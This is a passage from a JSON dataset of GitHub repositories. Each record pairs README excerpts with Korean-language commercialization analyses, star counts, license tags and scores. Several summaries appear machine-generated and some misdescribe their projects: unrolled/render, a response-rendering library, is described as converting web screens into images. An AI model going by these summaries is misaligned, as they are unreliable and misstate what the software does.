편집기나 텍스트 처리 프로그램에서 대용량 텍스트를 빠르고 효율적으로 다루는 핵심 엔진 역할을 할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 문서 편집 SaaS**: 구글 독스 같은 웹 기반 문서 작성 서비스에서 사용자가 입력하는 모든 글자를 빠르게 처리하는 기술로 판매\n2. **개발","readme_excerpt":"# Ropey\n\n[![CI Build Status][github-ci-img]][github-ci]\n[![Latest Release][crates-io-badge]][crates-io-url]\n[![Documentation][docs-rs-img]][docs-rs-url]\n\nRopey is a utf8 text rope for Rust, designed to be the backing text-buffer for\napplications such as text editors.  Ropey is fast, robust, and can handle huge\ntexts and memory-incoherent edits with ease.\n\n\n## Example Usage\n\n```rust\n// Load a text file.\nlet mut text = ropey::Rope::from_reader(\n    File::open(\"my_great_book.txt\")?\n)?;\n\n// Print the 516th line (zero-indexed).\nprintln!(\"{}\", text.line(515));\n\n// Get the start/end char indices of the line.\nlet start_idx = text.line_to_char(515);\nlet end_idx = text.line_to_char(516);\n\n// Remove the line...\ntext.remove(start_idx..end_idx);\n\n// ...and replace it with something better.\ntext.insert(start_idx, \"The flowers are... so... dunno.\\n\");\n\n// Print the changes, along with the previous few lines for context.\nlet start_idx = text.line_to_char(511);\nlet end_idx = text.line_to_char(516);\npri","composite_score":0.0166,"license_safety_tag":"safe"},{"name":"asciinema/asciinema-player","github_url":"https://github.com/asciinema/asciinema-player","stars":6,"language":"JavaScript","license":"apache-2.0","abandonment_months":1,"description":"# asciinema-player 상용화 분석\n\n## 왜 보물인가\n터미널(검은 화면) 작업 영상을 웹에서 재생할 수 있게 해주는 도구로, 개발자 교육·문서화·데모 영상 제작에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 개발 교육 SaaS** - 프로그래밍 강의 플랫폼에서 실시간 코딩 과정을 영상처럼 보여주되, 학생이 일시정지/재생 제어 가능","readme_excerpt":"# asciinema player\n\n[![Build status](https://github.com/asciinema/asciinema-player/actions/workflows/build.yml/badge.svg)](https://github.com/asciinema/asciinema-player/actions/workflows/build.yml)\n\n__asciinema player__ is a web player for terminal sessions recordings.\n\nUnlike typical web _video_ players, which play heavyweight video files (`.mp4`,\n`.mov`), asciinema player plays lightweight terminal session recordings in the\ntext-based [asciicast](https://docs.asciinema.org/manual/asciicast/v3/) format\n(`.cast`), such as those produced by the [asciinema\nrecorder](https://docs.asciinema.org/manual/cli/).\n\nThe player is built from the ground up with JavaScript and\n[Rust](https://www.rust-lang.org/) ([WASM](https://webassembly.org/)), and is\navailable as [npm package](https://www.npmjs.com/package/asciinema-player) and a\n[standalone JS\nbundle](https://github.com/asciinema/asciinema-player/releases/latest).\n\nYou can use it on any HTML page - in a project documentation, on a blog, or in a\n","composite_score":0.0165,"license_safety_tag":"safe"},{"name":"TimothyYe/godns","github_url":"https://github.com/TimothyYe/godns","stars":5,"language":"Go","license":"apache-2.0","abandonment_months":1,"description":"# GoDNS 상용화 분석\n\n## 왜 보물인가\n인터넷 주소(도메인)를 자동으로 업데이트해주는 기술로, 집이나 사무실의 인터넷 주소가 자주 바뀌는 소상공인과 중소기업의 서비스 운영을 안정적으로 지원할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 사무실의 보안 카메라, 원격 접속 시스템을 24시간 운영하는 자동 관리 서비스\n2","readme_excerpt":"```text\n ██████╗  ██████╗ ██████╗ ███╗   ██╗███████╗\n██╔════╝ ██╔═══██╗██╔══██╗████╗  ██║██╔════╝\n██║  ███╗██║   ██║██║  ██║██╔██╗ ██║███████╗\n██║   ██║██║   ██║██║  ██║██║╚██╗██║╚════██║\n╚██████╔╝╚██████╔╝██████╔╝██║ ╚████║███████║\n ╚═════╝  ╚═════╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝\n```\n\n[![Apache licensed][9]][10] [![Docker][3]][4] [![Go Report Card][11]][12] [![GoDoc][13]][14]\n\n[3]: https://img.shields.io/docker/image-size/timothyye/godns/latest\n[4]: https://hub.docker.com/r/timothyye/godns\n[9]: https://img.shields.io/badge/license-Apache-blue.svg\n[10]: LICENSE\n[11]: https://goreportcard.com/badge/github.com/timothyye/godns\n[12]: https://goreportcard.com/report/github.com/timothyye/godns\n[13]: https://godoc.org/github.com/TimothyYe/godns?status.svg\n[14]: https://godoc.org/github.com/TimothyYe/godns\n\n[GoDNS](https://github.com/TimothyYe/godns) is a self-hosted dynamic DNS (DDNS) client with multi-provider support and a built-in web panel. It is a rewrite in [Go](https://golang.org) of my ea","composite_score":0.0165,"license_safety_tag":"safe"},{"name":"modern-js-dev/modern.js","github_url":"https://github.com/modern-js-dev/modern.js","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Modern.js 저장소 분석 리포트\n\n## 왜 보물인가\n웹사이트나 앱을 만드는 개발자들이 더 쉽고 빠르게 개발할 수 있도록 도와주는 통합 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: 초보 개발자들이 Modern.js를 사용한 프로젝트 템플릿을 제공하는 구독형 학습 서비스\n2. **개발팀용 내부 도구**: 회사의 개발","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://modernjs.dev\" target=\"blank\"><img src=\"./assets/modernjs-banner.png\" width=\"260\" alt=\"Modern.js Logo\" /></a>\n</p>\n\n<h1 align=\"center\">Modern.js</h1>\n\n<p align=\"center\">\n  Inspire creativity in modern web development.\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/@modern-js/core\"><img src=\"https://img.shields.io/npm/v/@modern-js/core?style=flat-square&color=00a8f0\" alt=\"npm version\" /></a>\n  <a href=\"https://npm-compare.com/@modern-js/core/#timeRange=THREE_YEARS\"><img src=\"https://img.shields.io/npm/dm/@modern-js/core.svg?style=flat-square&color=00a8f0\" alt=\"downloads\" /></a>\n  <a href=\"https://github.com/web-infra-dev/modern.js/blob/main/LICENSE\"><img src=\"https://img.shields.io/badge/License-MIT-blue.svg?style=flat-square&color=00a8f0\" alt=\"License\" /></a>\n</p>\n\nEnglish | [简体中文](./README.zh-CN.md)\n\n## Introduction\n\nThe Modern.js framework is a progressive web framework based on React. At ByteDance, we use Modern.js to build upp","composite_score":0.0164,"license_safety_tag":"safe"},{"name":"symfony/monolog-bundle","github_url":"https://github.com/symfony/monolog-bundle","stars":5,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Symfony Monolog Bundle 상용화 분석\n\n## 왜 보물인가\n웹사이트나 애플리케이션에서 발생하는 모든 문제를 자동으로 기록하고 추적하는 필수 도구로, 서비스 운영 시 발생하는 버그를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 모니터링 플랫폼**\n고객사의 웹서비스에서 발생하는 오류를 실시간으로 감지하고","readme_excerpt":"MonologBundle\n=============\n\nThe `MonologBundle` provides integration of the [Monolog](https://github.com/Seldaek/monolog)\nlibrary into the Symfony framework.\n\nMore information in the official [documentation](https://symfony.com/doc/current/logging.html).\n\nLicense\n=======\n\nThis bundle is released under the [MIT license](LICENSE)\n","composite_score":0.0164,"license_safety_tag":"safe"},{"name":"koskimas/kysely","github_url":"https://github.com/koskimas/kysely","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Kysely 저장소 분석\n\n## 왜 보물인가\n개발자들이 웹사이트나 앱의 데이터를 쉽게 관리할 수 있도록 도와주는 핵심 기술로, 복잡한 작업을 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여러 고객의 데이터를 안전하게 분리 저장하고 관리하는 클라우드 기반 업무 도구\n- **내부 업무 도구**: 회사 직원들이 사용하는 고객","readme_excerpt":"[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://stand-with-ukraine.pp.ua)\n\n[![NPM Version](https://img.shields.io/npm/v/kysely?style=flat&label=latest)](https://github.com/kysely-org/kysely/releases/latest)\n[![Socket Badge](https://badge.socket.dev/npm/package/kysely/0.29.2)](https://socket.dev/npm/package/kysely/overview/0.29.2)\n[![Tests](https://github.com/kysely-org/kysely/actions/workflows/test.yml/badge.svg)](https://github.com/kysely-org/kysely)\n[![License](https://img.shields.io/github/license/kysely-org/kysely?style=flat)](https://github.com/kysely-org/kysely/blob/master/LICENSE)\n[![Issues](https://img.shields.io/github/issues-closed/kysely-org/kysely?logo=github)](https://github.com/kysely-org/kysely/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc)\n[![Pull Requests](https://img.shields.io/github/issues-pr-closed/kysely-org/kysely?label=PRs&logo=github&style=flat)](https://github.com/kysely-org/kysely/pul","composite_score":0.0164,"license_safety_tag":"safe"},{"name":"unrolled/render","github_url":"https://github.com/unrolled/render","stars":7,"language":"Go","license":"mit","abandonment_months":1,"description":"# unrolled/render 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱의 화면을 자동으로 그림으로 변환해주는 기술로, 복잡한 작업을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **보고서 자동화 서비스**: 매월 생성해야 하는 리포트를 자동으로 이미지화하여 고객에게 제공하는 SaaS\n2. **소셜미디어 관리 도구**: 마케팅 팀이 광고나 ","readme_excerpt":"# Render [![GoDoc](https://pkg.go.dev/badge/github.com/unrolled/render)](http://godoc.org/github.com/unrolled/render) [![Test](https://github.com/unrolled/render/actions/workflows/test.yaml/badge.svg)](https://github.com/unrolled/render/actions)\n\n\nRender is a package that provides functionality for easily rendering JSON, XML, text, binary data, and HTML templates.\n\n## Usage\nRender can be used with pretty much any web framework providing you can access the `http.ResponseWriter` from your handler. The rendering functions simply wraps Go's existing functionality for marshaling and rendering data.\n\n- HTML: Uses the [html/template](http://golang.org/pkg/html/template/) package to render HTML templates.\n- JSON: Uses the [encoding/json](http://golang.org/pkg/encoding/json/) package to marshal data into a JSON-encoded response.\n- XML: Uses the [encoding/xml](http://golang.org/pkg/encoding/xml/) package to marshal data into an XML-encoded response.\n- Binary data: Passes the incoming data straig","composite_score":0.0163,"license_safety_tag":"safe"},{"name":"StopDDoS/packet-captures","github_url":"https://github.com/StopDDoS/packet-captures","stars":22,"language":"","license":"unknown","abandonment_months":1,"description":"# StopDDoS/packet-captures 분석\n\n## 왜 보물인가\n인터넷 공격으로부터 우리 집, 회사, 은행을 보호하는 방법을 연구하고 배울 수 있는 실제 공격 사례 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 교육 SaaS**: 기업 직원들에게 사이버 공격의 위험성을 가르치는 온라인 교육 플랫폼\n2. **내부 보안 모니터링 도구**: 회사","readme_excerpt":"# DDoS Packet Capture Collection\n\nThis is a collection of multiple anonymized packet captures of real-world and lab-tested DDoS attacks.\n\n## Mirror\nGithub has disabled LFS on this repository due to the high amount of downloads. A zipped version of this repository can be downloaded at [https://wqrld.net/captures.zip](https://wqrld.net/captures.zip).\n\n## Goal\nThe goal of providing these captures is to stimulate the growth of ddos research. \nReal-world DDoS captures are hard to come by which makes research harder.\nWe are trying to overcome that issue.\n\n\n## License\nThese captures may be freely used to build and improve DDoS Protection systems. \nAttribution is not required, but greatly appreciated. Do not claim any of these resources as your own.\n\n## Citing\nThe following information can be used when citing this dataset:\n\nL.F. Haaijer, *DDoS Packet Capture Collection*, (2022). Available from https://github.com/StopDDoS/packet-captures\n\n\n## Contributing\nIf these captures or any of our other r","composite_score":0.0163,"license_safety_tag":"unknown"},{"name":"bundesAPI/deutschland","github_url":"https://github.com/bundesAPI/deutschland","stars":5,"language":"HTML","license":"Apache-2.0","abandonment_months":1,"description":"# bundesAPI/deutschland 저장소 분석\n\n## 왜 보물인가\n독일 정부의 공식 데이터(우편번호, 행정 구역, 공휴일 등)를 누구나 쉽게 활용할 수 있도록 정리한 도구로, 독일 관련 비즈니스에 필수적인 신뢰할 수 있는 정보 출처입니다.\n\n## 어디에 쓸 수 있나\n1. **배송·물류 서비스**: 독일 내 주소 검색, 우편번호 자동 완성 기능이 있","readme_excerpt":"[![PyPI version deutschland](https://badge.fury.io/py/deutschland.svg)](https://pypi.python.org/pypi/deutschland/)\n[![GitHub license](https://img.shields.io/github/license/bundesAPI/deutschland.svg)](https://github.com/bundesAPI/deutschland/blob/main/LICENSE)\n\n[![Lint](https://github.com/bundesAPI/deutschland/actions/workflows/black.yml/badge.svg?branch=main)](https://github.com/bundesAPI/deutschland/actions/workflows/black.yml)\n[![Publish Python 🐍 distributions 📦 to PyPI and TestPyPI](https://github.com/bundesAPI/deutschland/actions/workflows/publish.yml/badge.svg?branch=main)](https://github.com/bundesAPI/deutschland/actions/workflows/publish.yml)\n[![Run Python 🐍 tests](https://github.com/bundesAPI/deutschland/actions/workflows/runtests.yml/badge.svg?branch=main)](https://github.com/bundesAPI/deutschland/actions/workflows/runtests.yml)\n\n# Deutschland\nA python package that gives you easy access to the most valuable datasets of Germany.\n\n## Installation\n```bash\npip install deutschland\n","composite_score":0.0163,"license_safety_tag":"safe"},{"name":"federico-terzi/espanso","github_url":"https://github.com/federico-terzi/espanso","stars":5,"language":"Rust","license":"GPL-3.0","abandonment_months":0,"description":"# Espanso 저장소 분석\n\n## 왜 보물인가\n반복되는 글을 자동으로 완성해주는 생산성 도구로, 매일 타이핑하는 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 웹 서비스**: 클라우드 기반 자동완성 플랫폼으로 운영하여 여러 기기에서 동기화되는 유료 구독 서비스\n2. **기업 내부 도구**: 콜센터나 고객 지원팀이 자주 ","readme_excerpt":"# ![Espanso Logo](images/espanso-dark.png#gh-dark-mode-only) ![Espanso Logo](images/espanso-light.png#gh-light-mode-only)\n\n> *A cross-platform Text Expander written in Rust*\n\n![GitHub release (latest by date)](https://img.shields.io/github/v/release/espanso/espanso)\n![Maintenance](https://img.shields.io/badge/Maintained-yes-green.svg)\n![Language](https://img.shields.io/badge/language-rust-orange)\n![License](https://img.shields.io/github/license/espanso/espanso)\n\n![Platforms](https://img.shields.io/badge/platforms-Windows%2C%20macOS%20and%20Linux-blue)\n\n[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/espanso/espanso)\n\n|         Example: 2019          |              Example: 2025              |\n| :----------------------------: | :-------------------------------------: |\n| ![example](images/example.gif) | ![example2025](images/example-2025.gif) |\n\n## Quick Links\n\n* [espanso website](https://espanso.org)\n* [espanso hub](https://hub.espanso.org/)\n\n### What is a Text E","composite_score":0.0163,"license_safety_tag":"restricted"},{"name":"reakit/reakit","github_url":"https://github.com/reakit/reakit","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":0,"description":"# Reakit 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 더 쉽게 만들 수 있도록 도와주는 미리 만들어진 디자인 부품 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업이 고급 UI/UX 개발 비용을 줄이고 빠르게 제품 출시할 수 있는 디자인 시스템으로 제공\n2. **내부 업무 도구**: 기업의 관리자 화면, 대시보드, ","readme_excerpt":"<h1 align=\"center\">\n  <img alt=\"Ariakit\" src=\"https://github.com/user-attachments/assets/26aacca5-32eb-48ae-bf01-3dfc3f93176a\" height=\"320\">\n</h1>\n\n<p align=\"center\">\n  Toolkit with accessible components, styles, and examples for your next web app.\n  <br>\n  <a href=\"https://ariakit.com\"><strong>Explore website »</strong></a>\n</p>\n\n<br>\n\n<div align=\"center\">\n\n<a href=\"https://github.com/ariakit/ariakit/discussions\"><img alt=\"GitHub Discussions\" src=\"https://img.shields.io/github/discussions/ariakit/ariakit?logo=github&color=007acc\"></a>&nbsp;\n<a href=\"https://github.com/ariakit/ariakit/releases\"><img alt=\"GitHub Release Date\" src=\"https://img.shields.io/github/release-date/ariakit/ariakit?logo=github&color=007acc\"></a>&nbsp;\n<a href=\"https://npmjs.org/package/@ariakit/react\"><img alt=\"NPM version\" src=\"https://img.shields.io/npm/v/@ariakit/react.svg?logo=npm&color=007acc\" /></a>&nbsp;\n<a href=\"https://npmjs.org/package/@ariakit/react\"><img alt=\"NPM downloads\" src=\"https://img.shields.io","composite_score":0.0163,"license_safety_tag":"unknown"},{"name":"aquasecurity/starboard","github_url":"https://github.com/aquasecurity/starboard","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# Starboard 저장소 분석\n\n## 왜 보물인가\n컨테이너와 클라우드 환경의 보안 문제를 자동으로 찾아내고 보고하는 오픈소스 도구로, 기업의 IT 인프라 안전성을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 인프라 보안 검사 서비스로 기업 고객에게 월 구독료를 받고 제공\n2. **내부 업무 도구*","readme_excerpt":"# Starboard is joining Trivy.\n\nWe've announced our plans to discontinue Starboard and merge it into [Trivy](https://github.com/aquasecurity/trivy).\n\nStarboard CLI has been reintroduced as [trivy kubernetes](https://aquasecurity.github.io/trivy/latest/docs/kubernetes/cli/scanning/) command and starboard-operator with a focus on trivy capabilities is available as [Trivy-Operator](https://aquasecurity.github.io/trivy/latest/docs/kubernetes/operator/).\n\nWe will not be accepting new features/pull requests/issues.\nwe encourage you to contribute to [Trivy-Operator](https://github.com/aquasecurity/trivy-operator) and [Trivy CLI](https://github.com/aquasecurity/trivy) and influence the future of Trivy Kubernetes.\n\nfor more info and [discussions](https://github.com/aquasecurity/starboard/discussions/1173)\n\nCheckout the latest : [What's next for Trivy Q&A](https://www.youtube.com/watch?v=u3cixRRJyYg)\n\n![Starboard logo](docs/images/starboard-logo.png)\n\n> Kubernetes-native security toolkit.\n\n[![Git","composite_score":0.0162,"license_safety_tag":"safe"},{"name":"mathworks/MathWorks-Excellence-in-Innovation","github_url":"https://github.com/mathworks/MathWorks-Excellence-in-Innovation","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":0,"description":"# MathWorks Excellence in Innovation 저장소 분석\n\n## 왜 보물인가\n세계 최고의 엔지니어링 소프트웨어 회사가 공개한 혁신 프로젝트들이 모여 있어서, 첨단 기술 트렌드와 실무 사례를 한눈에 볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 엔지니어링 설계·시뮬레이션 클라우드 플랫폼 (자동차·항공사 대상)","readme_excerpt":"<img align=\"left\" src=\"https://gist.githubusercontent.com/robertogl/e0115dc303472a9cfd52bbbc8edb7665/raw/MathWorksLogo.png\" width=\"120\">\r\n\r\n# MATLAB and Simulink Challenge Projects\r\n\r\n**Contribute to the progress of engineering and science by solving key\r\nindustry challenges!**\r\n\r\n<img align=\"right\" src=\"https://gist.githubusercontent.com/robertogl/e0115dc303472a9cfd52bbbc8edb7665/raw/logo.png\" width=\"120\">\r\n\r\nAre you looking for a design or research project idea with real industry relevance and societal impact?  \r\n\r\nExplore this list of challenge projects to learn about technology trends, gain practical skills with MATLAB and Simulink, and make a contribution to science and engineering. \r\nEven more, you gain official recognition for your problem-solving skills from technology leaders at MathWorks and rewards upon project completion! \r\n\r\n\r\n:books: If you are new to MATLAB and Simulink or want to learn more, discover [this comprehensive repository of resources for students](https://gith","composite_score":0.0162,"license_safety_tag":"unknown"},{"name":"NVIDIA/TRTorch","github_url":"https://github.com/NVIDIA/TRTorch","stars":13,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"# NVIDIA/TRTorch 분석\n\n## 왜 보물인가\nNVIDIA의 공식 AI 가속화 도구로, 복잡한 인공지능 모델을 훨씬 빠르게 실행할 수 있게 만들어주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 이미지 생성 SaaS**: 사용자가 올린 사진을 빠르게 처리하는 웹 서비스 (예: 배경 제거, 초상화 변환)\n2. **실시간 영상 분석 API**","readme_excerpt":"<div align=\"center\">\n\nTorch-TensorRT\n===========================\n<h4> Easily achieve the best inference performance for any PyTorch model on the NVIDIA platform. </h4>\n\n[![Documentation](https://img.shields.io/badge/docs-master-brightgreen)](https://nvidia.github.io/Torch-TensorRT/)\n[![pytorch](https://img.shields.io/badge/PyTorch-2.13-green)](https://download.pytorch.org/whl/nightly/cu130)\n[![cuda](https://img.shields.io/badge/CUDA-13.0-green)](https://developer.nvidia.com/cuda-downloads)\n[![trt](https://img.shields.io/badge/TensorRT-10.16.1-green)](https://github.com/nvidia/tensorrt)\n[![license](https://img.shields.io/badge/license-BSD--3--Clause-blue)](./LICENSE)\n[![Linux x86-64 Nightly Wheels](https://github.com/pytorch/TensorRT/actions/workflows/build-test-linux-x86_64.yml/badge.svg?branch=nightly)](https://github.com/pytorch/TensorRT/actions/workflows/build-test-linux-x86_64.yml)\n[![Linux SBSA Nightly Wheels](https://github.com/pytorch/TensorRT/actions/workflows/build-test-linux-","composite_score":0.0162,"license_safety_tag":"safe"},{"name":"ibireme/yyjson","github_url":"https://github.com/ibireme/yyjson","stars":5,"language":"C","license":"MIT","abandonment_months":0,"description":"# yyjson 프로젝트 분석\n\n## 왜 보물인가\n복잡한 데이터를 빠르고 안정적으로 처리하는 핵심 기술로, 데이터를 다루는 거의 모든 소프트웨어에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 처리 SaaS**: 대량의 고객 정보나 판매 기록을 빠르게 정리하고 분석해주는 웹 서비스\n2. **내부 업무 도구**: 회사의 수천 개 거래 기록을","readme_excerpt":"\n# Introduction\n\n[![Build](https://img.shields.io/github/actions/workflow/status/ibireme/yyjson/checks.yml?branch=master&style=flat-square)](https://github.com/ibireme/yyjson/actions/workflows/checks.yml)\n[![Codecov](https://img.shields.io/codecov/c/github/ibireme/yyjson/master?style=flat-square)](https://codecov.io/gh/ibireme/yyjson)\n[![License](https://img.shields.io/github/license/ibireme/yyjson?color=blue&style=flat-square)](https://github.com/ibireme/yyjson/blob/master/LICENSE)\n[![Version](https://img.shields.io/github/v/release/ibireme/yyjson?color=orange&style=flat-square)](https://github.com/ibireme/yyjson/releases)\n[![Packaging status](https://img.shields.io/repology/repositories/yyjson.svg?style=flat-square)](https://repology.org/project/yyjson/versions)\n\nA high performance JSON library written in ANSI C.\n\n# Features\n- **Fast**: can read or write gigabytes of JSON data per second on modern CPUs.\n- **Portable**: complies with ANSI C (C89), no explicit SIMD.\n- **Strict**: compl","composite_score":0.0162,"license_safety_tag":"safe"},{"name":"prisma-labs/graphql-request","github_url":"https://github.com/prisma-labs/graphql-request","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# GraphQL-Request 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 데이터를 주고받을 때 필요한 핵심 도구인데, MIT 라이선스로 자유롭게 사용하고 개조할 수 있어 사업화에 유리합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사에 데이터 연동 기능을 제공하는 통합 플랫폼에 내장\n2. **내부 업무 도구**: 여러 외부 서","readme_excerpt":"> [!NOTE]\n> Looking for `graphql-request`? It's been renamed to Graffle and the old version is available on the [`graphql-request` branch](https://github.com/graffle-js/graffle/tree/graphql-request).\n\n<p align=\"center\">\n  <img src=\"./website/content/public/_assets/logo-dark.png\" width=\"200\" alt=\"Graffle Logo\">\n</p>\n\n<h1 align=\"center\">Graffle</h1>\n\n<p align=\"center\">\n  <b>Minimal. Extensible. Type Safe. GraphQL client for JavaScript.</b>\n</p>\n\n<p align=\"center\">\n  ✨ Document Builder with full type inference • 🧰 Powerful extension system<br/>\n  🚛 Multi-transport (HTTP + in-memory) • 🎭 Native GraphQL syntax support<br/>\n  📦 Rich ecosystem of extensions • 🧙 Custom scalar codecs\n</p>\n\n<p align=\"center\">\n  <a href=\"https://graffle.js.org\">Documentation</a> •\n  <a href=\"https://graffle.js.org/guides/getting-started\">Getting Started</a> •\n  <a href=\"https://graffle.js.org/examples\">Examples</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/graffle\"><img src=\"https://img.sh","composite_score":0.016,"license_safety_tag":"safe"},{"name":"mitsuhiko/indicatif","github_url":"https://github.com/mitsuhiko/indicatif","stars":5,"language":"Rust","license":"mit","abandonment_months":1,"description":"# Indicatif 저장소 분석\n\n## 왜 보물인가\n컴퓨터 프로그램이 작업을 처리할 때 진행 상황을 사용자에게 시각적으로 보여주는 도구로, 프로그래머들이 널리 사용하는 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **파일 업로드/다운로드 SaaS**: 대용량 파일 처리 시 진행률 표시 기능 제공\n2. **데이터 분석 내부 도구**: 수백만 개 데이터","readme_excerpt":"# indicatif\n\n[![Documentation](https://docs.rs/indicatif/badge.svg)](https://docs.rs/indicatif/)\n[![Crates.io](https://img.shields.io/crates/v/indicatif.svg)](https://crates.io/crates/indicatif)\n[![Build status](https://github.com/console-rs/indicatif/workflows/CI/badge.svg)](https://github.com/console-rs/indicatif/actions/workflows/rust.yml)\n[![Chat](https://img.shields.io/discord/976380008299917365?logo=discord)](https://discord.gg/YHmNA3De4W)\n\nA Rust library for indicating progress in command line applications to users.\n\nThis currently primarily provides progress bars and spinners as well as basic\ncolor support, but there are bigger plans for the future of this!\n\n## Examples\n\n[examples/yarnish.rs](examples/yarnish.rs)\n<img src=\"https://github.com/console-rs/indicatif/blob/main/screenshots/yarn.gif?raw=true\">\n\n[examples/download.rs](examples/download.rs)\n<img src=\"https://github.com/console-rs/indicatif/blob/main/screenshots/download.gif?raw=true\">\n\n[examples/multi.rs](examples/multi","composite_score":0.016,"license_safety_tag":"safe"},{"name":"denolib/awesome-deno","github_url":"https://github.com/denolib/awesome-deno","stars":6,"language":"","license":"CC0-1.0","abandonment_months":1,"description":"# awesome-deno 저장소 분석\n\n## 왜 보물인가\nDeno라는 새로운 프로그래밍 언어의 유용한 도구와 라이브러리를 모아놓은 디렉토리로, 개발자들이 시간을 절약하고 더 쉽게 시작할 수 있도록 돕는 핵심 자료모음입니다.\n\n## 어디에 쓸 수 있나\n- **웹 애플리케이션 개발 교육 플랫폼**: Deno 초보자들을 위한 온라인 강좌 운영, 추천 도구 큐레","readme_excerpt":"# Awesome Deno [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\n[<img src=\"deno-logo.png\" align=\"right\" width=\"100\">](https://deno.land)\n\nDeno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.\n\nThis list is a collection of the best Deno modules and resources.\n\n## Contents\n\n- [Docs](#docs)\n  - [Official Docs](#official-docs)\n  - [External Docs](#external-docs)\n- [Modules](#modules)\n  - [Automation](#automation)\n  - [CLI utils](#cli-utils)\n  - [Cloud APIs](#cloud-apis)\n  - [Database](#database)\n  - [Editor framework](#editor-framework)\n  - [Frontend framework](#frontend-framework)\n  - [Game engine](#game-engine)\n  - [Logging](#logging)\n  - [Machine Learning](#machine-learning)\n  - [Mail](#mail)\n  - [Markdown](#markdown)\n  - [Math](#math)\n  - [Static site generator](#static-site-generator)\n  - [String utils](#string-utils)\n  - [Social Platform APIs](#social-platform-apis)\n  - [Template engine](#template-engine)\n  - [Test","composite_score":0.016,"license_safety_tag":"unknown"},{"name":"poooi/poi","github_url":"https://github.com/poooi/poi","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# poooi/poi 상용화 분석\n\n## 왜 보물인가\nMIT 라이선스로 완전히 자유로운 사용이 가능하며, 5년 이상 꾸준히 유지되는 안정적인 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 코드를 기반으로 웹/모바일 앱을 만들어 구독료 형태로 판매\n2. **내부 업무 도구**: 대기업이나 기관에서 자신들의 시스템에 통합","readme_excerpt":"![Header](https://raw.githubusercontent.com/poooi/poi/master/assets/img/header.png)\n\n# poi\n\npoi is a scalable browser and tool set for _Kantai Collection_(KanColle).\n\nKey features include:\n\n- Proxy: HTTP, Socks5 and PAC (Experimental)\n- Cache, including custom cache\n- Data synthesis and analysis\n- Notification\n- Plugin support for extensive functionalities, [see plugin List](https://github.com/poooi/poi/wiki/List-of-available-plugins)\n\n\n[![Dependencies](https://img.shields.io/librariesio/github/poooi/poi)](https://libraries.io/github/poooi/poi)\n\n\n[![Backers on Open Collective](https://opencollective.com/poi/backers/badge.svg)](#backers)\n[![Sponsors on Open Collective](https://opencollective.com/poi/sponsors/badge.svg)](#sponsors)\n[![license:mit](https://img.shields.io/badge/license-mit-blue.svg)](https://opensource.org/licenses/MIT)\n\n## Screenshots\n\n![Preview 1](https://user-images.githubusercontent.com/3816900/58731579-ae9fb480-8421-11e9-8a28-f7002f84c0ae.png)\n\n[More screenshots are a","composite_score":0.0159,"license_safety_tag":"safe"},{"name":"djnzx/rust-course","github_url":"https://github.com/djnzx/rust-course","stars":72,"language":"Rust","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.0159,"license_safety_tag":"unknown"},{"name":"EdenEast/nightfox.nvim","github_url":"https://github.com/EdenEast/nightfox.nvim","stars":6,"language":"Lua","license":"MIT","abandonment_months":1,"description":"# nightfox.nvim 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 코드 편집 프로그램을 더 예쁘고 편하게 만드는 디자인 테마로, 작지만 충성도 높은 사용자층을 확보할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 코드 편집기(예: GitHub Codespaces, Replit)에 기본 테마로 탑","readme_excerpt":"<p align=\"center\">\n  <img width=\"128\" height=\"128\" src=\"https://user-images.githubusercontent.com/2746374/179428323-6d6b5e7f-6459-47b3-9e03-fea7553d85af.svg\" />\n</p>\n\n<h1 align=\"center\">Nightfox</h1>\n\n<p align=\"center\">\n  <a href=\"https://github.com/edeneast/nightfox.nvim/stargazers\"><img 